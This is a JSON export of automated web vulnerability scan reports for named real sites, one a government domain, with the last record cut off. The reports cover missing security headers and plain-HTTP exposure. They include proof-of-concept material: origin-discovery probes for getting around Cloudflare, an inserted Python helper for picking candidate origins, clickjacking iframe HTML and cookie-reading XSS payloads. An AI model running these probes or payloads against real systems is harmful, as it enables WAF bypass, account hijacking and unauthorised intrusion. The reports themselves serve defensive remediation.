[{"_id":{"$oid":"6a0d64865bbc057e6099d075"},"created_at":{"$date":"2026-05-20T07:36:38.928Z"},"url":"https://pro.anveshaktool.in/","tool":"generate_web_vulnerability_report","result":{"url":"https://pro.anveshaktool.in/","category":"web_vulnerability","timestamp":"2026-05-20T07:36:38.922194+00:00","report":"### [Multiple IPs Found / https://pro.anveshaktool.in/ / N/A]\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | web_vulnerability |\n| Asset / URL | https://pro.anveshaktool.in/ |\n\n**Description**  \nThis informational finding indicates that multiple IP addresses were identified for the domain `pro.anveshaktool.in`. These include IPv4 and IPv6 addresses associated with Cloudflare's infrastructure (e.g., 104.21.23.154, 172.67.211.177). This behavior is typical when a website is fronted by a CDN or reverse proxy such as Cloudflare, which distributes traffic across geographically dispersed edge nodes. All four addresses fall inside Cloudflare's published anycast ranges, so a request sent to any of them still passes through Cloudflare: they are edge nodes, not the origin.\n\nWhile not inherently a vulnerability, the resolution data is useful reconnaissance. It confirms that the site sits behind a CDN/WAF, which tells an attacker that the real question is whether the origin's own address can be found elsewhere (historical DNS records, a subdomain that is not proxied, MX or TXT records, certificate transparency logs) and whether that origin accepts traffic that did not arrive via Cloudflare.\n\n**Attack Scenario (Proof of Concept)**  \nAn attacker enumerates the A and AAAA records with `dig` (one query per record type; `nslookup -type=A` and `nslookup -type=AAAA` give the same result):\n\n```bash\n$ dig +short pro.anveshaktool.in A\n104.21.23.154\n172.67.211.177\n$ dig +short pro.anveshaktool.in AAAA\n2606:4700:3030::6815:179a\n2606:4700:3031::ac43:d3b1\n```\n\nEach address is then checked against Cloudflare's published IP list; anything outside those ranges is a candidate origin. A candidate is probed by sending the real `Host` header straight to it, for example `curl -sI --resolve pro.anveshaktool.in:443:<candidate-ip> https://pro.anveshaktool.in/` (`<candidate-ip>` is a placeholder), and comparing the response with the one served through Cloudflare. 
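The classification step above, as an added example that is not part of the scanner output: it parses `dig +short` output and sorts each address into CDN edge or candidate origin using the `ipaddress` module. The Cloudflare prefix list is a hand-typed snapshot and is an assumption to be refreshed from https://www.cloudflare.com/ips/; the sample input is the four addresses from the finding plus one constructed non-Cloudflare address (203.0.113.10, from the RFC 5737 documentation range) so both branches are exercised.

```python
# Added example (not from the scan report): classify resolved addresses as CDN edge
# or candidate origin. CLOUDFLARE_PREFIXES is a hand-typed snapshot (assumption);
# refresh it from https://www.cloudflare.com/ips/ before relying on the result.
import ipaddress

CLOUDFLARE_PREFIXES = [
    '173.245.48.0/20', '103.21.244.0/22', '103.22.200.0/22', '103.31.4.0/22',
    '141.101.64.0/18', '108.162.192.0/18', '190.93.240.0/20', '188.114.96.0/20',
    '197.234.240.0/22', '198.41.128.0/17', '162.158.0.0/15', '104.16.0.0/13',
    '104.24.0.0/14', '172.64.0.0/13', '131.0.72.0/22',
    '2400:cb00::/32', '2606:4700::/32', '2803:f800::/32', '2405:b500::/32',
    '2405:8100::/32', '2a06:98c0::/29', '2c0f:f248::/32',
]

# The four addresses the scan returned, plus one constructed non-Cloudflare address
# (203.0.113.10, RFC 5737 documentation range) to show the other branch.
DIG_OUTPUT = '''
104.21.23.154
172.67.211.177
2606:4700:3030::6815:179a
2606:4700:3031::ac43:d3b1
203.0.113.10
'''

def parse_dig_short(text):
    """Return the IP addresses in `dig +short` output, skipping CNAME targets."""
    addrs = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            addrs.append(ipaddress.ip_address(line))
        except ValueError:
            continue  # a CNAME target or other non-address line
    return addrs

def classify(addrs, cdn_prefixes=CLOUDFLARE_PREFIXES):
    """Map each address to 'cdn' if it sits inside a known CDN prefix, else 'candidate-origin'."""
    nets = [ipaddress.ip_network(p) for p in cdn_prefixes]
    result = {}
    for addr in addrs:
        # `addr in net` is False across address families, so v4/v6 mixing is safe
        hit = any(addr in net for net in nets)
        result[str(addr)] = 'cdn' if hit else 'candidate-origin'
    return result

def candidate_origins(text, cdn_prefixes=CLOUDFLARE_PREFIXES):
    """Addresses worth probing with --resolve: everything that is not a CDN edge."""
    return [ip for ip, kind in classify(parse_dig_short(text), cdn_prefixes).items()
            if kind == 'candidate-origin']

if __name__ == '__main__':
    for ip, kind in classify(parse_dig_short(DIG_OUTPUT)).items():
        print(f'{ip:28} {kind}')
```

Run it on the real `dig +short` output of the two commands above; anything reported as `candidate-origin` is what the `curl --resolve` probe should be pointed at, and a host whose only answers are `cdn` has not leaked its origin through this DNS name at all.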
If the origin answers, the attacker can reach it without the CDN's filtering, rate limiting or bot protection, and any weakness on the origin can be exploited directly.\n\n**Business Impact**  \nAlthough this does not pose immediate risk, it provides reconnaissance value to adversaries who may uncover misconfigured internal systems or unprotected endpoints behind public-facing services.\n\n**Remediation**  \nEnsure that origin servers are configured to reject requests not routed through the CDN/WAF:\n- Restrict access at the firewall level to allow only trusted CDN ranges (Cloudflare publishes its IPv4 and IPv6 ranges; refresh the allow-list when they change).\n- Implement proper host header validation on the origin server, and prefer an origin-side check that does not depend on source IP alone, such as Cloudflare's Authenticated Origin Pulls (client certificates).\n- Regularly audit DNS entries (including subdomains, MX and TXT records) and remove any that expose the origin address.\n\n---\n\n### [Strict-Transport-Security Header Not Set / https://pro.anveshaktool.in/ / https://pro.anveshaktool.in/]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://pro.anveshaktool.in/ |\n\n**Description**  \nThe HTTP Strict Transport Security (HSTS) header is missing from responses sent by the application. The HSTS header instructs browsers to use HTTPS for every future request to the host for the lifetime of `max-age`, rewriting `http://` URLs before any request leaves the browser and refusing to let the user click through certificate errors. This closes the window for downgrade attacks and for session cookies that lack the `Secure` flag being sent in clear text.\n\nWithout this header, every navigation that starts as plain HTTP (a typed hostname, an `http://` link or bookmark) is exposed to an active network attacker. With HSTS only the very first visit is exposed, and preloading closes even that gap.\n\n**Attack Scenario (Proof of Concept)**  \nIf an attacker on the path (a hostile Wi-Fi network or a compromised router) intercepts the first connection attempt to `http://pro.anveshaktool.in`, they can answer it themselves instead of letting the server's redirect to HTTPS reach the user. Example interception flow:\n\n1. User types `pro.anveshaktool.in` without a scheme.\n2. Browser sends the request over plain HTTP because it holds no HSTS policy for the host.\n3. Attacker responds with a fake login page (or proxies the real site while keeping the victim's side of the connection on HTTP).\n4. Credentials stolen.\n\nAlternatively, if cookies lack the `Secure` flag, session tokens could be transmitted over plaintext HTTP if the user manually navigates to HTTP URLs.\n\n**Business Impact**  \nPotential exposure of sensitive credentials and sessions due to insecure transport protocols. Could lead to phishing success rates increasing and compromise of authenticated accounts.\n\n**Remediation**  \nAdd the following header to all HTTPS responses (browsers ignore it on plain-HTTP responses, so the HTTP-to-HTTPS redirect must exist as well):\n\n```apache\nHeader always set Strict-Transport-Security \"max-age=31536000; includeSubDomains; preload\"\n```\n\nOr in NGINX:\n\n```nginx\nadd_header Strict-Transport-Security \"max-age=31536000; includeSubDomains; preload\" always;\n```\n\nFor a Cloudflare-fronted host the header can also be set at the edge (SSL/TLS, Edge Certificates, HSTS). Roll out with a short `max-age` first and raise it once every host under the domain is confirmed to work over HTTPS: the policy cannot be withdrawn from browsers that have already cached it. Only add `preload` and submit the domain at hstspreload.org when that holds for the whole registrable domain (`anveshaktool.in`), because the preload list is keyed by the registrable domain and removal takes months.\n\nReference: [OWASP Secure Headers Project](https://owasp.org/www-project-secure-headers/#div-http-strict-transport-security-hsts)\n\nCWE: CWE-319  \nRFC: RFC 6797  \n\n---\n\n### [Strict-Transport-Security Header Not Set / https://pro.anveshaktool.in/sitemap.xml / https://pro.anveshaktool.in/sitemap.xml]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://pro.anveshaktool.in/sitemap.xml |\n\n**Description**  \nSame root cause as the previous entry, reported against `/sitemap.xml`. HSTS is a per-host policy: a browser records it from any HTTPS response that carries the header and then applies it to every URL on that host, so this is the same gap as the previous finding rather than an additional one. The scanner lists each URL it fetched without the header.\n\n**Attack Scenario (Proof of Concept)**  \nIf a crawler or user fetches the sitemap over plain HTTP (which this host allows, see the finding below), an on-path attacker can rewrite it so that the listed pages point at non-TLS URLs, steering crawlers and link-followers onto HTTP.\n\nExample intercepted response modification:\n\n```xml\n<url>\n  <loc>http://pro.anveshaktool.in/login</loc>\n</url>\n```\n\nThis increases the chance that a login form or other sensitive interface is reached over HTTP.\n\n**Business Impact**  \nRisk of search engines indexing insecure versions of critical pages, leading to increased attack surface and potential credential theft.\n\n**Remediation**  \nApply the host-wide HSTS header as described previously; once any HTTPS response on the host carries it, this URL is covered too. Redirect all HTTP requests to HTTPS so the sitemap is never served in clear text.\n\n---\n\n### [Strict-Transport-Security Header Not Set / https://pro.anveshaktool.in/robots.txt / https://pro.anveshaktool.in/robots.txt]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://pro.anveshaktool.in/robots.txt |\n\n**Description**  \nThe same host-wide HSTS gap, reported against `robots.txt`. Without HSTS (and with HTTP still served, see below) a fetch of `robots.txt` over HTTP can be tampered with by an on-path attacker, hiding or exposing crawler directives. Note that `robots.txt` is advisory only: `Disallow` lines are a hint to well-behaved crawlers and, to an attacker, a list of paths worth looking at.\n\n**Attack Scenario (Proof of Concept)**  \nIntercepting and modifying `robots.txt` delivered over HTTP:\n\nOriginal:\n```\nUser-agent: *\nDisallow: /admin/\n```\n\nModified:\n```\nUser-agent: *\nAllow: /\n```\n\nThis could cause well-behaved crawlers to index areas the site wanted kept out of search results.\n\n**Business Impact**  \nMisleading SEO bots and increasing visibility of sensitive directories. The directories themselves must be protected by authentication, not by `robots.txt`.\n\n**Remediation**  \nEnforce HSTS host-wide as outlined earlier. 
Additionally, serve `robots.txt` exclusively over HTTPS and validate its integrity regularly.\n\n---\n\n### [X-Content-Type-Options Header Missing / https://pro.anveshaktool.in/robots.txt / https://pro.anveshaktool.in/robots.txt]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 4.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://pro.anveshaktool.in/robots.txt |\n\n**Description**  \nThe `X-Content-Type-Options: nosniff` header is absent. With it, browsers treat the declared `Content-Type` as binding: they refuse to run a `<script src>` or apply a `<link rel=stylesheet>` whose response is not served as a JavaScript or CSS type, and they do not content-sniff responses into HTML. Without it, a response whose declared type is missing or generic may be interpreted as HTML or script based on its bytes (older Internet Explorer did this even for `text/plain`). The header is defence in depth; the primary control is an accurate `Content-Type` on every response and serving user uploads as downloads rather than rendering them.\n\n**Attack Scenario (Proof of Concept)**  \nSuppose an attacker uploads a `.txt` file containing embedded script tags:\n\n```html\n<script>alert(1)</script>\n```\n\nIf served without a correct `Content-Type` and without `nosniff`, a sniffing browser may render it as HTML and execute the payload; a `<script src>` on an attacker's page pointing at the same URL is only refused when `nosniff` is present.\n\nRequest:\n```http\nGET /uploads/malicious.txt HTTP/1.1\nHost: pro.anveshaktool.in\n```\n\nResponse lacks both `Content-Type` and `X-Content-Type-Options`.\n\nBrowser interprets content based on sniffing logic → XSS triggered. (The `/uploads/` path is illustrative; the scanner flagged the missing header on `robots.txt`, which is correctly `text/plain` and not itself exploitable.)\n\n**Business Impact**  \nPossible cross-site scripting (XSS) exploitation via MIME-type confusion, especially concerning legacy clients or misconfigured upload handlers.\n\n**Remediation**  \nSet the following header in all HTTP responses:\n\nApache:\n```apache\nHeader always set X-Content-Type-Options \"nosniff\"\n```\n\nNGINX:\n```nginx\nadd_header X-Content-Type-Options \"nosniff\" always;\n```\n\nEnsure accurate `Content-Type` headers accompany each resource.\n\nReference: [OWASP Secure Headers Project](https://owasp.org/www-project-secure-headers/#div-x-content-type-options)\n\nCWE: CWE-116\n\n---\n\n### [HTTPS Content Available via HTTP / https://pro.anveshaktool.in/robots.txt / https://pro.anveshaktool.in/robots.txt]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://pro.anveshaktool.in/robots.txt |\n\n**Description**  \nResources accessed over HTTPS are also served over plain HTTP with a `200` response instead of a redirect. Any page or asset a user reaches via `http://` can therefore be read and modified in transit without any browser warning, and the HSTS findings above cannot be fully fixed until this is closed: browsers only honour `Strict-Transport-Security` on HTTPS responses, so users must be moved onto HTTPS before the policy can take hold.\n\n**Attack Scenario (Proof of Concept)**  \nAccessing `http://pro.anveshaktool.in/robots.txt` returns the same content as the HTTPS version rather than a redirect:\n\n```bash\ncurl -sI http://pro.anveshaktool.in/robots.txt\n```\n\nA `200 OK` here (rather than `301` with `Location: https://...`) confirms the finding. Content fetched this way is visible to, and can be altered by, anyone on the network path.\n\n**Business Impact**  \nExposure of potentially sensitive information about disallowed paths, weakening overall defense posture against automated scanning tools.\n\n**Remediation**  \nRedirect all HTTP traffic to HTTPS permanently using 301 redirects:\n\nApache:\n```apache\nRewriteEngine On\nRewriteCond %{HTTPS} off\nRewriteRule ^(.*)$ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301]\n```\n\nNGINX:\n```nginx\nserver {\n    listen 80;\n    listen [::]:80;\n    server_name pro.anveshaktool.in;\n    return 301 https://$host$request_uri;\n}\n```\n\nOn Cloudflare the same redirect is available as the \"Always Use HTTPS\" setting. Additionally, configure HSTS to prevent future regressions.\n\n---\n\n### [Re-examine Cache-control Directives / https://pro.anveshaktool.in/robots.txt / https://pro.anveshaktool.in/robots.txt]\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | web_vulnerability |\n| Asset / URL | https://pro.anveshaktool.in/robots.txt |\n\n**Description**  \nThe `Cache-Control` header is either absent or improperly configured, allowing caching of responses by intermediate proxies or browsers. While acceptable for static assets, improper caching of dynamic or sensitive content poses risks. For `robots.txt` itself the only consequence is slow propagation of changes; the header matters far more on authenticated pages, which must never be stored by shared caches.\n\n**Attack Scenario (Proof of Concept)**  \nIf `robots.txt` contains time-sensitive exclusions and is cached for a year:\n\n```http\nCache-Control: max-age=31536000\n```\n\nThen changes made to exclude new admin panels won’t propagate until the cached copy expires, and crawlers holding the old copy keep indexing. (Google, for example, documents that it caches `robots.txt` for up to 24 hours regardless, and the file is advisory: an admin panel is protected by authentication, not by exclusion from the index.)\n\n**Business Impact**  \nDelayed propagation of updated security policies; possible leakage of temporary secrets or private routes.\n\n**Remediation**  \nImplement granular cache control strategies:\n\nFor sensitive or authenticated responses:\n```http\nCache-Control: no-store\n```\n\n(`no-store` alone is sufficient for modern caches; `no-cache, must-revalidate`, `Pragma: no-cache` and `Expires: 0` are only needed for legacy HTTP/1.0 intermediaries.)\n\nFor versioned static assets:\n```http\nCache-Control: public, max-age=31536000, immutable\n```\n\nFor `robots.txt` and similar files that change occasionally, a short lifetime such as `max-age=3600` is appropriate. Review all endpoints and tailor caching rules accordingly.\n\n---\n\n### [Clickjacking Protection / https://pro.anveshaktool.in/ / https://pro.anveshaktool.in/]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 4.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://pro.anveshaktool.in/ |\n\n**Description**  \nNeither an `X-Frame-Options` header nor a Content Security Policy with `frame-ancestors` is present, so any site may load this application in an iframe. An attacker could embed the page inside an invisible iframe and trick users into performing unintended actions (e.g., clicking buttons, submitting forms) while they believe they are interacting with the attacker's page.\n\n**Attack Scenario (Proof of Concept)**  \nAttacker creates a malicious webpage that places a transparent iframe of the target on top of a decoy button, so the victim's click lands in the framed page (a decoy placed on top of the iframe would absorb the click instead of passing it through):\n\n```html\n<style>\n  #decoy  { position:absolute; top:200px; left:300px; z-index:1; }\n  #target { position:absolute; top:0; left:0; width:100%; height:100%;\n            opacity:0; z-index:2; }  /* invisible, but on top and clickable */\n</style>\n<button id=\"decoy\">Click Me!</button>\n<iframe id=\"target\" src=\"https://pro.anveshaktool.in/\"></iframe>\n```\n\nThe iframe is offset so that a sensitive control of the framed page sits exactly over the decoy. Victim clicks what looks like the attacker's button and unknowingly activates the control in the framed, authenticated page.\n\n**Business Impact**  \nUnauthorized actions performed on behalf of logged-in users, including form submissions, deletions, or privilege escalations.\n\n**Remediation**  \nAdd the following header to all responses:\n\nApache:\n```apache\nHeader always set X-Frame-Options \"DENY\"\n# Or \"SAMEORIGIN\" if framing needed internally\n```\n\nNGINX:\n```nginx\nadd_header X-Frame-Options \"DENY\" always;\n```\n\nAlso set the Content Security Policy `frame-ancestors` directive (`frame-ancestors 'none'` or `'self'`), which takes precedence over `X-Frame-Options` in browsers that support it and is the only way to allow a specific list of framing origins; `X-Frame-Options: ALLOW-FROM` is obsolete. Keep `X-Frame-Options` for older clients.\n\nReference: [OWASP Clickjacking Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html)\n\nCWE: CWE-451\n\n---\n\n### [HTTP Strict Transport Security (HSTS) / https://pro.anveshaktool.in/ / https://pro.anveshaktool.in/]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://pro.anveshaktool.in/ |\n\n**Description**  \nDuplicate of prior HSTS findings. 
No additional context provided beyond what is already covered; the scanner reports the same missing header under two rule names.\n\n**Attack Scenario (Proof of Concept)**  \nSee previous HSTS-related sections.\n\n**Business Impact**  \nSee previous HSTS-related sections.\n\n**Remediation**  \nSee previous HSTS-related sections.\n\n---\n\n### [MIME Type Confusion / https://pro.anveshaktool.in/ / https://pro.anveshaktool.in/]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 4.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://pro.anveshaktool.in/ |\n\n**Description**  \nSame root cause as the earlier X-Content-Type-Options issue, reported here for the site root. Absence of the `nosniff` directive enables MIME-sniffing-based attacks.\n\n**Attack Scenario (Proof of Concept)**  \nSee previous X-Content-Type-Options section.\n\n**Business Impact**  \nSee previous X-Content-Type-Options section.\n\n**Remediation**  \nSee previous X-Content-Type-Options section.","summary":{"total":11}},"summary":{"total":11}},{"_id":{"$oid":"6a0e864d0759bb65a6ed1f87"},"created_at":{"$date":"2026-05-21T04:13:01.045Z"},"url":"https://springs.com.pk","tool":"generate_web_vulnerability_report","result":{"url":"https://springs.com.pk","category":"web_vulnerability","timestamp":"2026-05-21T04:13:01.038209+00:00","report":"### [Multiple IPs Found / springs.com.pk / N/A]\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | web_vulnerability |\n| Asset / URL | https://springs.com.pk |\n\n**Description**  \nThe Nikto scan identified that the domain `springs.com.pk` resolves to multiple IP addresses: one IPv4 (`208.91.112.55`) and one IPv6 (`2001:cdba::3257:9652`). This is normal for a dual-stack host, but the two addresses are two separate entry points and must be configured identically; a web server, firewall or WAF rule applied only to the IPv4 listener leaves the IPv6 path unprotected.\n\nAn attacker may use this information during reconnaissance to map out infrastructure redundancy, identify backend systems, or attempt targeted attacks against the less secure of the two endpoints.\n\n**Attack Scenario (Proof of Concept)**  \n1. Attacker performs a DNS lookup using `dig` or `nslookup`:  \n   ```bash\n   dig +short A springs.com.pk\n   dig +short AAAA springs.com.pk\n   ```\n2. Observes both IPv4 and IPv6 records returned.\n3. Probes each address individually, sending the real `Host` header so the request reaches the intended virtual host rather than the server default, and compares response headers, content and security posture:\n   ```bash\n   curl -sI --resolve springs.com.pk:443:208.91.112.55 https://springs.com.pk/\n   curl -sI --resolve 'springs.com.pk:443:[2001:cdba::3257:9652]' https://springs.com.pk/\n   curl -sI -H 'Host: springs.com.pk' http://208.91.112.55/\n   ```\n\nDifferences between the answers (a missing redirect, an older `Server` banner, a security header present on one address and not the other) reveal inconsistent configuration or a legacy stack reachable on one address family only.\n\n**Business Impact**  \nWhile not directly exploitable, exposure of multiple IPs increases the attack surface by revealing additional network entry points. It may assist attackers in identifying outdated or misconfigured hosts which might lack current patches or hardened configurations.\n\n**Remediation**  \nEnsure all exposed IP addresses are intentionally configured and uniformly secured:\n- Audit DNS records to confirm only necessary IPs are published.\n- Ensure consistent application-level and server-level hardening across all resolved endpoints, including firewall rules for IPv6.\n- Implement centralized logging and monitoring for traffic anomalies from these IPs.\n- Where applicable, restrict access at the firewall level if certain IPs should not be publicly accessible.\n\n---\n\n### [Missing Content Security Policy / springs.com.pk / GET https://springs.com.pk/]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 4.3 (AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://springs.com.pk/ |\n\n**Description**  \nThe website does not implement a Content Security Policy (CSP), so any Cross-Site Scripting (XSS) flaw in it is exploitable without mitigation. 
CSP provides an added layer of protection by allowing website owners to define trusted sources of content and restrict inline scripts or object execution.\n\nWithout CSP, even minor XSS flaws become more dangerous as they allow arbitrary script injection with no second line of defence such as nonce- or hash-based script restrictions or `'strict-dynamic'`.\n\n**Attack Scenario (Proof of Concept)**  \nIf an XSS vulnerability exists elsewhere on the site, an attacker could inject malicious JavaScript like:\n```html\n<script>alert(document.cookie)</script>\n```\nBecause no CSP header blocks inline execution, the browser executes the payload, potentially stealing session cookies or performing actions under user context.\n\nExample request showing missing CSP:\n```http\nGET / HTTP/1.1\nHost: springs.com.pk\n...\n\nResponse Headers:\nServer: Apache\nContent-Type: text/html; charset=UTF-8\n...\n(No Content-Security-Policy header present)\n```\n\n**Business Impact**  \nLack of CSP increases risk of successful XSS exploitation, leading to account compromise, phishing, credential theft, or defacement. In regulated industries, this may lead to compliance violations related to data integrity and confidentiality.\n\n**Remediation**  \nImplement a CSP via HTTP response headers. Start in report-only mode to find legitimate inline scripts and third-party sources that the policy would block (add `report-to`/`report-uri` to collect violations centrally; without it they appear only in the browser console):\n```apache\nHeader always set Content-Security-Policy-Report-Only \"default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'; frame-ancestors 'self'\"\n```\nThen move inline scripts to external files or give them a per-response nonce, and enforce:\n```apache\nHeader always set Content-Security-Policy \"default-src 'self'; script-src 'self' 'nonce-<random-per-response>'; object-src 'none'; base-uri 'self'; frame-ancestors 'self'\"\n```\n(`<random-per-response>` is a placeholder for a value the application generates freshly for every response and also writes into each legitimate `<script nonce=...>` tag.) A policy whose `script-src` contains `'unsafe-inline'` without a nonce or hash provides no XSS protection at all, so it is acceptable only as a temporary migration step. Prefer the HTTP header to a `<meta http-equiv=\"Content-Security-Policy\">` tag: the meta form cannot express `frame-ancestors`, `report-uri`/`report-to` or `sandbox`, and only applies from the point in the document where it appears.\n\nReference: [OWASP CSP Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Content_Security_Policy_Cheat_Sheet.html), CWE-693\n\n---\n\n### [Missing X-Frame-Options Header / springs.com.pk / GET https://springs.com.pk/]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 4.3 (AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://springs.com.pk/ |\n\n**Description**  \nThe `X-Frame-Options` header is absent from responses (and no CSP `frame-ancestors` directive stands in for it), making the site susceptible to clickjacking attacks. Clickjacking occurs when a malicious page places a transparent frame of the legitimate site over decoy elements, tricking users into clicking controls they cannot see.\n\nProperly setting `X-Frame-Options` prevents framing by third-party sites, mitigating such risks.\n\n**Attack Scenario (Proof of Concept)**  \nAttacker creates an HTML page embedding the target in a transparent iframe that sits above a decoy, so the click passes into the framed page:\n```html\n<style>\n  #decoy  { position:absolute; top:200px; left:300px; z-index:1; }\n  #target { position:absolute; top:0; left:0; width:800px; height:600px;\n            opacity:0; z-index:2; }\n</style>\n<div id=\"decoy\">Click here to win!</div>\n<iframe id=\"target\" src=\"https://springs.com.pk/\"></iframe>\n```\nVictim clicks what appears to be a harmless link, but actually interacts with hidden buttons inside the framed page—e.g., submitting forms or authorizing transactions unknowingly.\n\n**Business Impact**  \nPotential unauthorized actions taken on behalf of authenticated users, including financial transfers, profile changes, or deletion of resources. Reputational harm due to perceived lack of basic security controls.\n\n**Remediation**  \nAdd the following HTTP response header (use `set`, not `append`: appending to an existing value can produce a comma-joined header that browsers treat as invalid):\n```apache\nHeader always set X-Frame-Options SAMEORIGIN\n```\nAlso set the modern equivalent, the `frame-ancestors` directive in CSP, which takes precedence where supported:\n```http\nContent-Security-Policy: frame-ancestors 'self';\n```\n\nReference: [OWASP Clickjacking Defense Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html), CWE-1021\n\n---\n\n### [Missing HSTS Header / springs.com.pk / GET https://springs.com.pk/]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 5.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://springs.com.pk/ |\n\n**Description**  \nHTTP Strict Transport Security (HSTS) is not enforced, meaning browsers may still connect over unencrypted HTTP initially before being redirected to HTTPS. An active man-in-the-middle (MITM) attacker could intercept initial plaintext requests and prevent redirection to HTTPS, exposing sensitive data.\n\nEnabling HSTS ensures that future connections automatically upgrade to HTTPS, reducing MITM risks.\n\n**Attack Scenario (Proof of Concept)**  \n1. Victim types `springs.com.pk` in their browser without a scheme.\n2. The browser holds no HSTS entry for the host, so it sends the request over plain HTTP.\n3. Attacker intercepts the request and serves a fake login form instead of letting the redirect to HTTPS through.\n4. User submits credentials over the insecure channel.\n\nThe header must be checked on the HTTPS response, because browsers ignore `Strict-Transport-Security` received over HTTP. Here the plain-HTTP request is redirected, but the HTTPS response carries no policy:\n```http\nGET / HTTP/1.1\nHost: springs.com.pk\n\nHTTP/1.1 301 Moved Permanently\nLocation: https://springs.com.pk/\n\nGET / HTTP/1.1            (over TLS)\nHost: springs.com.pk\n\nHTTP/1.1 200 OK\nServer: Apache\n...\n(No Strict-Transport-Security header)\n```\n\n**Business Impact**  \nRisk of session hijacking, credential interception, and downgrade attacks. Especially critical for authentication flows or e-commerce functionality.\n\n**Remediation**  \nSet the HSTS header with sufficient max-age and includeSubDomains/preload flags:\n```apache\nHeader always set Strict-Transport-Security \"max-age=31536000; includeSubDomains; preload\"\n```\nEnsure the TLS certificate is valid and every subdomain is served over HTTPS before enabling HSTS, and only add `preload` once the domain is ready to be submitted to hstspreload.org; the policy cannot be withdrawn from browsers that have cached it.\n\nReference: [RFC 6797](https://tools.ietf.org/html/rfc6797), OWASP Transport Layer Protection Cheat Sheet, CWE-319\n\n---\n\n### [Missing X-Content-Type-Options Header / springs.com.pk / GET https://springs.com.pk/]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 4.3 (AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://springs.com.pk/ |\n\n**Description**  \nThe `X-Content-Type-Options` header is missing, increasing susceptibility to MIME type sniffing attacks. Browsers sometimes guess file types based on content rather than declared MIME types, which can result in files meant to be inert being interpreted as HTML or scripts.\n\nSetting `X-Content-Type-Options: nosniff` instructs browsers to strictly adhere to declared MIME types, and in addition makes them refuse `<script>` and stylesheet loads whose response is not served as a JavaScript or CSS type.\n\n**Attack Scenario (Proof of Concept)**  \nSuppose an attacker uploads a file named `image.jpg`, but its contents are actually HTML with embedded JavaScript:\n```html\n<script>alert('Sniffed!');</script>\n```\nIf the upload is served with a generic or missing type (`text/plain` in the example below), a browser that sniffs the body (older Internet Explorer did so for `text/plain`; all browsers do when `Content-Type` is absent) may render it as HTML and run the script, and a `<script src>` on an attacker's page pointing at the file is only refused when `nosniff` is present.\n\nExample response shows absence:\n```http\nGET /upload/image.jpg HTTP/1.1\nHost: springs.com.pk\n...\n\nHTTP/1.1 200 OK\nContent-Type: text/plain\n...\n(No X-Content-Type-Options header)\n```\n\n**Business Impact**  \nIncreased likelihood of XSS and other client-side code injection vulnerabilities. Can facilitate bypass of input validation and content filtering systems.\n\n**Remediation**  \nInclude the following HTTP response header globally:\n```apache\nHeader always set X-Content-Type-Options nosniff\n```\nApply especially to dynamic content, uploaded files, and API responses, and serve uploads with an accurate `Content-Type` (and `Content-Disposition: attachment` where they need not render inline).\n\nReference: [MDN Web Docs – X-Content-Type-Options](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Content-Type-Options), CWE-16\n\n---","summary":{"total":5}},"summary":{"total":5}},{"_id":{"$oid":"6a0fac7f3baacd71f234d7f0"},"created_at":{"$date":"2026-05-22T01:08:15.284Z"},"url":"https://ep.gov.pk/","tool":"generate_web_vulnerability_report","result":{"url":"https://ep.gov.pk/","category":"web_vulnerability","timestamp":"2026-05-22T01:08:15.278179+00:00","report":"### [Nikto Scan Completed / https://ep.gov.pk/ / N/A]\n\n| Field | Value |\n|---|---|\n| 